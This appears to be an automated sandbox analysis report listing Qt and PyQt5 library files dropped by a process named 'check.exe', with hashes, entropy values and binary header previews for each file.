Size (bytes):	3385328
Entropy (8bit):	6.382356347494905
Encrypted:	false
SSDEEP:	49152:sU0O89Onk/cNTgO/WSLqfTPnK+9eaOiY95ZEQryD1pPG3L:MaHUKt3L
MD5:	2247EE4356666335DF7D72129AF8D600
SHA1:	F0131C1A67FC17C0E8DCC4A4CA38C9F1780E7182
SHA-256:	50FAD5605B3D57627848B3B84A744DFB6A045609B8236B04124F2234676758D8
SHA-512:	67F2A7BF169C7B9A516689CF1B16446CA50E57F099B9B742CCB1ABB2DCDE8867F8F6305AD8842CD96194687FC314715AE04C1942B0E0A4F51B592B028C5B16D3
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............t..t..t....t.A.p..t.A.w..t.A.q..t.A.u..t.u..t..u..t...q..t...t..t......t.....t...v..t.Rich..t.........PE..d....._.........." ......&.........L.&.......................................3.......3...`..........................................0..]....0.......3.P.....1.L.....3.......3..;...},.T...................P.,.(... ~,.0.............'..............................text...o.&.......&................. ..`.rdata........'.......&.............@..@.data.........1.......0.............@....pdata..L.....1.......1.............@..@.rsrc...P.....3......J3.............@..@.reloc...;....3..<...P3.............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\bin\opengl32sw.dll

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	20923392
Entropy (8bit):	6.255903817217008
Encrypted:	false
SSDEEP:	393216:LIckHor5uLnn83wAP5hxOZEa7/LzRuDFqILn5LgcKyZyQXt+8M:yEZbv
MD5:	7DBC97BFEE0C7AC89DA8D0C770C977B6
SHA1:	A064C8D8967AAA4ADA29BD9FEFBE40405360412C
SHA-256:	963641A718F9CAE2705D5299EAE9B7444E84E72AB3BEF96A691510DD05FA1DA4
SHA-512:	286997501E1F5CE236C041DCB1A225B4E01C0F7C523C18E9835507A15C0AC53C4D50F74F94822125A7851FE2CB2FB72F84311A2259A5A50DCE6F56BA05D1D7E8
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[.@..............'.......'.......'..[...........\|.-.....\|.+....\|..<....'......../.....q.*.....q.+....q.&.^...q.......q.,.....Rich............PE..d....._W.........." .....(....b.....\|&....................................... E...........`.........................................0.1.t.....1...............9.`n............C..k.. . .T..................... .(..... ..............@...............................text...T&.......(.................. ..`.rdata..XvO..@...xO..,..............@..@.data....;....1.......1.............@....pdata..`n....9..p...D3.............@..@.gfids.......pC.......=.............@..@.tls..........C.......=.............@..._RDATA........C.......=.............@..@.reloc...k....C..l....=.............@..B................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\generic\qtuiotouchplugin.dll

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	68080
Entropy (8bit):	6.207162014262433
Encrypted:	false
SSDEEP:	1536:mQ4IT53ign4CbtlO705xWL3frA5rlhgQJ7tapgUff:mLIT53Hbtk70OLs3hg0Cz
MD5:	750A31DE7840B5EED8BA14C1BD84D348
SHA1:	D345D13B0C303B7094D1C438E49F0046791DE7F6
SHA-256:	A9BFFB0F3CD69CD775C328C916E46440FE80D99119FAEBC350C7EC51E3E57C41
SHA-512:	5C0A68ED27A9F1BBFF104942152E475C94BB64B03CE252EAAC1A6770E24DC4156CE4ADE99EBCD92662801262DED892C33F84C605AD84472B45A83C4883D5E767
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............h..h..h...s.h..]...h.....h..]...h..]...h..]...h......h..h..&h......h......h......h......h..Rich.h..................PE..d...X._.........." .........b......$........................................@......{v....`......................................... ................ ..X....................0......H...T......................(.......0............................................text............................... ..`.rdata...E.......F..................@..@.data...............................@....pdata..............................@..@.qtmetadi...........................@..P.rsrc...X.... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\iconengines\qsvgicon.dll

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	41968
Entropy (8bit):	6.0993566622860635
Encrypted:	false
SSDEEP:	768:VPs5g31JfDgej5JZmA0ZsEEC6lmn+4FdDGimUf2hr:VkC31ee7ZmA+sEEC6lmn+4FOUfc
MD5:	313F89994F3FEA8F67A48EE13359F4BA
SHA1:	8C7D4509A0CAA1164CC9415F44735B885A2F3270
SHA-256:	42DDE60BEFCF1D9F96B8366A9988626B97D7D0D829EBEA32F756D6ECD9EA99A8
SHA-512:	06E5026F5DB929F242104A503F0D501A9C1DC92973DD0E91D2DAF5B277D190082DE8D37ACE7EDF643C70AA98BB3D670DEFE04CE89B483DA4F34E629F8ED5FECF
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n.:..i..i..i#.Ei...i...h(..i>..h(..i...h8..i...h-..i...h(..i...h-..i..i...i...h(..i...h+..i..)i+..i...h+..iRich*..i........................PE..d......_.........." .....@...F.......F..............................................C.....`..........................................g..x...hh..........H...........................xX..T....................Z..(....X..0............P...............................text....>.......@.................. ..`.rdata...3...P...4...D..............@..@.data................x..............@....pdata...............z..............@..@.qtmetadj...........................@..P.rsrc...H...........................@..@.reloc..............................@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\imageformats\qgif.dll

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	39408
Entropy (8bit):	6.0316011626259405
Encrypted:	false
SSDEEP:	768:ygk2hM0GskFtvPCjEIxh8eDzFyPddeeGvnhotdDGPUf2he:yN2a05kfPOEMaeDzFkddeFnhotOUfh
MD5:	52FD90E34FE8DED8E197B532BD622EF7
SHA1:	834E280E00BAE48A9E509A7DC909BEA3169BDCE2
SHA-256:	36174DD4C5F37C5F065C7A26E0AC65C4C3A41FDC0416882AF856A23A5D03BB9D
SHA-512:	EF3FB3770808B3690C11A18316B0C1C56C80198C1B1910E8AA198DF8281BA4E13DC9A6179BB93A379AD849304F6BB934F23E6BBD3D258B274CC31856DE0FC12B
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........R...3..3..3..KA.3..o\..3..X..3..o\..3..o\..3..o\..3.."C..3..3...3.."C..3.."C..3.."C-.3.."C..3..Rich.3..........PE..d...H._.........." .....@...B.......E...............................................^....`..........................................f..t....f..........@............~..............HW..T....................X..(....W..0............P...............................text...k?.......@.................. ..`.rdata..&)...P...*...D..............@..@.data...(............n..............@....pdata...............p..............@..@.qtmetads............v..............@..P.rsrc...@............x..............@..@.reloc...............\|..............@..B........................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\imageformats\qicns.dll

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	45040
Entropy (8bit):	6.016125225197622
Encrypted:	false
SSDEEP:	768:vEip0IlhxTDxut3dnm8IyAmQQ3ydJouEAkNypTAO0tfC3apmsdDG9Uf2hU:vxvXxgVIyA23ydJlEATpTAO0tfCKpms/
MD5:	AD84AF4D585643FF94BFA6DE672B3284
SHA1:	5D2DF51028FBEB7F6B52C02ADD702BC3FA781E08
SHA-256:	F4A229A082D16F80016F366156A2B951550F1E9DF6D4177323BBEDD92A429909
SHA-512:	B68D83A4A1928EB3390DEB9340CB27B8A3EB221C2E0BE86211EF318B4DD34B37531CA347C73CCE79A640C5B06FBD325E10F8C37E0CEE2581F22ABFBFF5CC0D55
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................a....Q........Q......Q......Q......................................Rich...........PE..d......_.........." .....B...N.......G...............................................&....`.............................................t...$...........@...........................xp..T....................r..(....p..0............`...............................text....@.......B.................. ..`.rdata...9...`...:...F..............@..@.data...............................@....pdata..............................@..@.qtmetadx...........................@..P.rsrc...@...........................@..@.reloc..............................@..B........................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\imageformats\qico.dll

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	38384
Entropy (8bit):	5.957072398645384
Encrypted:	false
SSDEEP:	768:zBXBEfQiAzC9Oh5AS7a3Z5OGrTDeV9mp7nnsWdDGgYUf2hi/:8JAzuOhy3zOGrTDeV9mp7nnsWjYUfz
MD5:	A9ABD4329CA364D4F430EDDCB471BE59
SHA1:	C00A629419509929507A05AEBB706562C837E337
SHA-256:	1982A635DB9652304131C9C6FF9A693E70241600D2EF22B354962AA37997DE0B
SHA-512:	004EA8AE07C1A18B0B461A069409E4061D90401C8555DD23DBF164A08E96732F7126305134BFAF8B65B0406315F218E05B5F0F00BEDB840FB993D648CE996756
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u.G...G...G...N...C......E...S...E......R......O......D.......B...G...........D.......F.......F.......F...RichG...................PE..d...H._.........." .....4...H.......9....................................................`..........................................h..t...th..........@............z..............(X..T....................Y..(....X..0............P..8............................text....2.......4.................. ..`.rdata..B/...P...0...8..............@..@.data...h............h..............@....pdata...............l..............@..@.qtmetad.............r..............@..P.rsrc...@............t..............@..@.reloc...............x..............@..B................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\imageformats\qjpeg.dll

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	421360
Entropy (8bit):	5.7491063936821405
Encrypted:	false
SSDEEP:	6144:USgOWz1eW38u9tyh6fpGUasBKTrsXWwMmH1l3JM5hn0uEfB4:USPQTnastBRB4
MD5:	16ABCCEB70BA20E73858E8F1912C05CD
SHA1:	4B3A32B166AB5BBBEE229790FDAE9CBC84F936BA
SHA-256:	FB4E980CB5FAFA8A4CD4239329AED93F7C32ED939C94B61FB2DF657F3C6AD158
SHA-512:	3E5C83967BF31C9B7F1720059DD51AA4338E518B076B0461541C781B076135E9CB9CBCEB13A8EC9217104517FBCC356BDD3FFACA7956D1C939E43988151F6273
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Iv"...L...L...L..o....L..xM...L..\|M...L.......L..xI...L..xH...L..xO...L..gM...L...M...L..gH.?.L..gI...L..gL...L..g....L..gN...L.Rich..L.........PE..d...o._.........." .....b...........i...............................................g....`.............................................t...............@....`.......R..............h...T.......................(.......0...............@............................text....`.......b.................. ..`.rdata..J............f..............@..@.data...8....P.......(..............@....pdata.......`... ...*..............@..@.qtmetad.............J..............@..P.rsrc...@............L..............@..@.reloc...............P..............@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\imageformats\qsvg.dll

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	32240
Entropy (8bit):	5.978149408776758
Encrypted:	false
SSDEEP:	768:uOVKDlJJVlTuLiMtsKVG7TSdDG9Uf2h4e:hVgJVlTuL/tsKVG7TSQUfre
MD5:	C0DE135782FA0235A0EA8E97898EAF2A
SHA1:	FCF5FD99239BF4E0B17B128B0EBEC144C7A17DE2
SHA-256:	B3498F0A10AC4CB42CF7213DB4944A34594FF36C78C50A0F249C9085D1B1FF39
SHA-512:	7BD5F90CCAB3CF50C55EAF14F7EF21E05D3C893FA7AC9846C6CA98D6E6D177263AC5EB8A85A34501BCFCA0DA7F0B6C39769726F4090FCA2231EE64869B81CF0B
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x>...P...P...P..a...P.&vQ...P..rQ...P.&vU...P.&vT...P.&vS...P.kiQ...P...Q.n.P.kiU...P.kiP...P.ki....P.kiR...P.Rich..P.........PE..d......_.........." .....$...B......D)....................................................`.........................................PU..t....U..........@............b...............G..T....................I..(...PH..0............@..(............................text....".......$.................. ..`.rdata...+...@...,...(..............@..@.data...8....p.......T..............@....pdata...............V..............@..@.qtmetad.............Z..............@..P.rsrc...@............\..............@..@.reloc...............`..............@..B........................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\imageformats\qtga.dll

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	31728
Entropy (8bit):	5.865766652452823
Encrypted:	false
SSDEEP:	768:1lGALluUEAQATWQ79Z2Y8Ar+dDG2vUf2hF:TZl/EH8WQ794Y8Ar+hvUfm
MD5:	A913276FA25D2E6FD999940454C23093
SHA1:	785B7BC7110218EC0E659C0E5ACE9520AA451615
SHA-256:	5B641DEC81AEC1CF7AC0CCE9FC067BB642FBD32DA138A36E3BDAC3BB5B36C37A
SHA-512:	CEBE48E6E6C5CDF8FC339560751813B8DE11D2471A3DAB7D648DF5B313D85735889D4E704E8EEC0AD1084AB43BE0EBDFBACD038AEAC46D7A951EFB3A7CE838EB
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........F ._'N._'N._'N.V_.Y'N..HO.]'N.KLO.]'N..HK.M'N..HJ.W'N..HM.\'N..WO.Z'N._'O.4'N..WK.\'N..WN.^'N..W..^'N..WL.^'N.Rich_'N.........................PE..d......_.........." ....."...@.......'..............................................7.....`..........................................W..t...dX..........@.......`....`..............(I..T....................J..(....I..0............@..h............................text...[!.......".................. ..`.rdata...)...@...*...&..............@..@.data........p.......P..............@....pdata..`............T..............@..@.qtmetadu............X..............@..P.rsrc...@............Z..............@..@.reloc...............^..............@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\imageformats\qtiff.dll

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	390128
Entropy (8bit):	5.724665470266677
Encrypted:	false
SSDEEP:	6144:V0jqHiFBaRe0GPAKwP15e7xrEEEEEEN024Rx/3tkYiHUASQbs/l7OanYoOgyV:0qqwP15bx/q7/yyV
MD5:	9C0ACF12D3D25384868DCD81C787F382
SHA1:	C6E877ABA3FB3D2F21D86BE300E753E23BB0B74E
SHA-256:	825174429CED6B3DAB18115DBC6C9DA07BF5248C86EC1BD5C0DCAECA93B4C22D
SHA-512:	45594FA3C5D7C4F26325927BB8D51B0B88E162E3F5E7B7F39A5D72437606383E9FDC8F83A77F814E45AFF254914514AE52C1D840A6C7B98767F362ED3F4FC5BD
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................E....q............q......q......q......<.............<......<......<......<.)....<......Rich....................PE..d......_.........." .....(..........D-.......................................0............`.............................................t...4...........@........%........... ..(....d..T................... f..(....d..0............@..0............................text....&.......(.................. ..`.rdata...v...@...x...,..............@..@.data...(...........................@....pdata...%.......&..................@..@.qtmetad............................@..P.rsrc...@...........................@..@.reloc..(.... ......................@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\imageformats\qwbmp.dll

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	30192
Entropy (8bit):	5.938644231596902
Encrypted:	false
SSDEEP:	768:EfEM3S46JE2X/xBZ76pC5J6GdDGZUf2h4:63S3JE2PHZ76pC5J6GEUfn
MD5:	68919381E3C64E956D05863339F5C68C
SHA1:	CE0A2AD1F1A46B61CB298CEC5AA0B25FF2C12992
SHA-256:	0F05969FB926A62A338782B32446EA3E28E4BFBFFC0DBD25ED303FAB3404ABAC
SHA-512:	6222A3818157F6BCD793291A6C0380EF8C6B93ECEA2E0C9A767D9D9163461B541AFAF8C6B21C5A020F01C95C6EE9B2B74B358BA18DA120F520E87E24B20836AA
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........]...<.I.<.I.<.I.D%I.<.I.S.H.<.I.W.H.<.I.S.H.<.I.S.H.<.I.S.H.<.IYL.H.<.I.<.I.<.IYL.H.<.IYL.H.<.IYLII.<.IYL.H.<.IRich.<.I........PE..d......_.........." ..... ...8.......'....................................................`......................................... D..t....D..........@....p..T....Z...............6..T...................p8..(...@7..0............0..p............................text............ .................. ..`.rdata..d&...0...(...$..............@..@.data........`.......L..............@....pdata..T....p.......N..............@..@.qtmetad~............R..............@..P.rsrc...@............T..............@..@.reloc...............X..............@..B........................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\imageformats\qwebp.dll

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	510448
Entropy (8bit):	6.605517748735854
Encrypted:	false
SSDEEP:	12288:bPTjgdqdsvh+LrLrLrL5/y4DVHAsqx3hXS+oPZQqRaYG:jT5sMLrLrLrL5q4dAsaOFo
MD5:	308E4565C3C5646F9ABD77885B07358E
SHA1:	71CB8047A9EF0CDB3EE27428726CACD063BB95B7
SHA-256:	6E37ACD0D357871F92B7FDE7206C904C734CAA02F94544DF646957DF8C4987AF
SHA-512:	FFAEECFAE097D5E9D1186522BD8D29C95CE48B87583624EB6D0D52BD19E36DB2860A557E19F0A05847458605A9A540C2A9899D53D36A6B7FD5BF0AD86AF88124
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................a....s........s......s......s....>.........>......>.....>....>......>....Rich...................PE..d......_.........." .....B..........tH.......................................0......`q....`..........................................W..t....W..........@.......0H........... ......h...T.......................(.......0............`...............................text...[@.......B.................. ..`.rdata..J....`.......F..............@..@.data....'...........X..............@....pdata..0H.......J...\..............@..@.qtmetadv...........................@..P.rsrc...@...........................@..@.reloc....... ......................@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\platforms\qminimal.dll

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	844784
Entropy (8bit):	6.625808732261156
Encrypted:	false
SSDEEP:	12288:y6MhioHKQ1ra8HT+bkMY8zKI4kwU7dFOTTYfEWmTxbwTlWc:BMhioHKQp+bkjAjwGdFSZtbwBd
MD5:	2F6D88F8EC3047DEAF174002228219AB
SHA1:	EB7242BB0FE74EA78A17D39C76310A7CDD1603A8
SHA-256:	05D1E7364DD2A672DF3CA44DD6FD85BED3D3DC239DCFE29BFB464F10B4DAA628
SHA-512:	0A895BA11C81AF14B5BD1A04A450D6DCCA531063307C9EF076E9C47BD15F4438837C5D425CAEE2150F3259691F971D6EE61154748D06D29E4E77DA3110053B54
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#\..B2..B2..B2..:...B2..-3..B2.F....B2..-7..B2..-6..B2..-1..B2..)6..B2.^23..B2..)3..B2..B3.@2.^26..B2.^27..B2.^22..B2.^2...B2.^20..B2.Rich.B2.........PE..d...N._.........." ......................................................... ............`......................................... ...x.......@.......H....`..H.......................T.......................(.......0...............(............................text...;........................... ..`.rdata...C.......D..................@..@.data...H....@......."..............@....pdata..H....`.......0..............@..@.qtmetad............................@..P.rsrc...H...........................@..@.reloc..............................@..B................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\platforms\qoffscreen.dll

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	754672
Entropy (8bit):	6.6323155845799695
Encrypted:	false
SSDEEP:	12288:/HpBmyVIRZ3Tck83vEgex5aebusGMIlhLfEWmpCJkl:/HpB63TckUcLaHMITAZmW
MD5:	6407499918557594916C6AB1FFEF1E99
SHA1:	5A57C6B3FFD51FC5688D5A28436AD2C2E70D3976
SHA-256:	54097626FAAE718A4BC8E436C85B4DED8F8FB7051B2B9563A29AEE4ED5C32B7B
SHA-512:	8E8ABB563A508E7E75241B9720A0E7AE9C1A59DD23788C74E4ED32A028721F56546792D6CCA326F3D6AA0A62FDEDC63BF41B8B74187215CD3B26439F40233F4D
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m..T..KT..KT..K]t7K@..K.c.JV..K@g.JV..K.cKU..K.c.JA..K.c.J\..K.c.JP..K.\|.JQ..KT..K...K.\|.Js..K.\|.JS..K.\|.JU..K.\|[KU..K.\|.JU..KRichT..K........PE..d...R._.........." ................L.....................................................`.............................................x...8...........H....... s...h..........p.......T................... ...(.......0...............@............................text............................... ..`.rdata..............................@..@.data...............................@....pdata.. s.......t..................@..@.qtmetad.............T..............@..P.rsrc...H............V..............@..@.reloc..p............Z..............@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\platforms\qwebgl.dll

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	482288
Entropy (8bit):	6.152380961313931
Encrypted:	false
SSDEEP:	6144:WO/vyK+DtyaHlIMDhg5WEOvAwKB2VaaHeqRw/yVfYu4UnCA6DEjeYchcD+1Zy2:bKtHOWg5OvAwK0NYu4AShcD+1U2
MD5:	1EDCB08C16D30516483A4CBB7D81E062
SHA1:	4760915F1B90194760100304B8469A3B2E97E2BC
SHA-256:	9C3B2FA2383EEED92BB5810BDCF893AE30FA654A30B453AB2E49A95E1CCF1631
SHA-512:	0A923495210B2DC6EB1ACEDAF76D57B07D72D56108FD718BD0368D2C2E78AE7AC848B90D90C8393320A3D800A38E87796965AFD84DA8C1DF6C6B244D533F0F39
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........gM..#...#...#..~....#.ei&...#.ei'...#.ei ...#..m'...#.ei"...#.(v"...#..m"...#..."...#.(v&...#.(v#...#.(v...#.(v!...#.Rich..#.................PE..d......_.........." .....R...........;....................................................`..........................................m..t...Dn..T.......@....@...=...@..............0...T.......................(.......0............p..(............................text...{Q.......R.................. ..`.rdata..:....p.......V..............@..@.data...H....0......................@....pdata...=...@...>..................@..@.qtmetadz............2..............@..P.rsrc...@............4..............@..@.reloc...............8..............@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\platforms\qwindows.dll

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1477104
Entropy (8bit):	6.575113537540671
Encrypted:	false
SSDEEP:	24576:4mCSPJrAbXEEuV9Hw2SoYFo3HdxjEgqJkLdLu5qpmZuhg/A2b:nPlIEEuV9Hw2SFFWHdWZsdmqja/A2b
MD5:	4931FCD0E86C4D4F83128DC74E01EAAD
SHA1:	AC1D0242D36896D4DDA53B95812F11692E87D8DF
SHA-256:	3333BA244C97264E3BD19DB5953EFA80A6E47AACED9D337AC3287EC718162B85
SHA-512:	0396BCCDA43856950AFE4E7B16E0F95D4D48B87473DC90CF029E6DDFD0777E1192C307CFE424EAE6FB61C1B479F0BA1EF1E4269A69C843311A37252CF817D84D
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......i...-...-...-...$.%.9.....q.,......8......%......)......+...9......9..,......)..........9..8...-..........d......,.....I.,......,...Rich-...........PE..d....._.........." .....,...h......4+..............................................n.....`.............................................x...(...........H............n..........X....r..T...................Pt..(... s..0............@...5...........................text..._+.......,.................. ..`.rdata.......@.......0..............@..@.data....m...@...D...(..............@....pdata...............l..............@..@.qtmetad.............J..............@..P.rsrc...H............L..............@..@.reloc..X............P..............@..B........................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\platformthemes\qxdgdesktopportal.dll

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	68592
Entropy (8bit):	6.125954940500008
Encrypted:	false
SSDEEP:	1536:Nt4B1RLj3S6TtH2sweUH+Hz6/4+D6VFsfvUfO:AB1RHFdoeUs6/4O6VFSZ
MD5:	F66F6E9EDA956F72E3BB113407035E61
SHA1:	97328524DA8E82F5F92878F1C0421B38ECEC1E6C
SHA-256:	E23FBC1BEC6CEEDFA9FD305606A460D9CAC5D43A66D19C0DE36E27632FDDD952
SHA-512:	7FF76E83C8D82016AB6BD349F10405F30DEEBE97E8347C6762EB71A40009F9A2978A0D8D0C054CF7A3D2D377563F6A21B97DDEFD50A9AC932D43CC124D7C4918
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+...o...o...o...f...k......m...{..m......~......h......m......h...o..........k......n.....~.n......n...Richo...........................PE..d...V._.........." .....z...t......T........................................@.......b....`......................................... ................ ..X....................0..4.......T.......................(...p...0...............x............................text....y.......z.................. ..`.rdata...Z.......\...~..............@..@.data...............................@....pdata..............................@..@.qtmetad............................@..P.rsrc...X.... ......................@..@.reloc..4....0......................@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\styles\qwindowsvistastyle.dll

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	144368
Entropy (8bit):	6.294675868932723
Encrypted:	false
SSDEEP:	3072:rrjwZ43rCOtrBk7wcR0l7wBlaL6BtIEt51T0Nhkqg8FoQY:7hZu9R0l7wFBtIEt51T0Nuqg8JY
MD5:	53A85F51054B7D58D8AD7C36975ACB96
SHA1:	893A757CA01472A96FB913D436AA9F8CFB2A297F
SHA-256:	D9B21182952682FE7BA63AF1DF24E23ACE592C35B3F31ECEEF9F0EABEB5881B9
SHA-512:	35957964213B41F1F21B860B03458404FBF11DAF03D102FBEA8C2B2F249050CEFBB348EDC3F22D8ECC3CB8ABFDC44215C2DC9DA029B4F93A7F40197BD0C16960
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......R._...1]..1]..1]..]..1]..0\..1]..5\..1]..2\..1]..4\..1]..0\..1]..0\..1]..0]..1]..4\..1]..1\..1]...]..1]..3\..1]Rich..1]........................PE..d...`._.........." .....\...........`.......................................`......wJ....`................................................. ........@..X.... ...............P.........T...................`...(...0...0............p...............................text....Z.......\.................. ..`.rdata......p.......`..............@..@.data...............................@....pdata....... ......................@..@.qtmetadm....0......................@..P.rsrc...X....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\translations\qt_ar.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	130
Entropy (8bit):	4.024232093209084
Encrypted:	false
SSDEEP:	3:j2wZC4C/2/vlAlHekW3/S1MUe3/CLlI+rwtbWlMrNtYs8ar/u:Cwm+/PtUePCRIRt6Ygs8y/u
MD5:	8FF05B56C0995F90A80B7064AA6E915C
SHA1:	D5AEB09AE557CEEFB758972EC4AC624CDDC9E6A7
SHA-256:	A8A1B0D6F958E7366D1C856BE61000106D3E7FC993FB931675369892B9002D0B
SHA-512:	5374E0F1D3F5A6A456B00732DE8005787B17ECEF9C8A2B2C1228966A6A8DE211700334D8FD789DAD269F52D0AEED3F5160010CA60909861E270C253B3EA881A4
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......ar....R.....q.t.b.a.s.e._.a.r.....q.t.s.c.r.i.p.t._.a.r.....q.t.m.u.l.t.i.m.e.d.i.a._.a.r..............$...*.

C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\translations\qt_bg.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	153
Entropy (8bit):	3.6813848812976975
Encrypted:	false
SSDEEP:	3:j2wZC4C/6lLlAlHekVYtzlY1MUdI7lULlI+rwtbWlMoIFl8IPldkO4t/z:CwDC+7tJjUWhURIRt68f8oiP1z
MD5:	466EED6C184D2055488D4C5EA9AE5F20
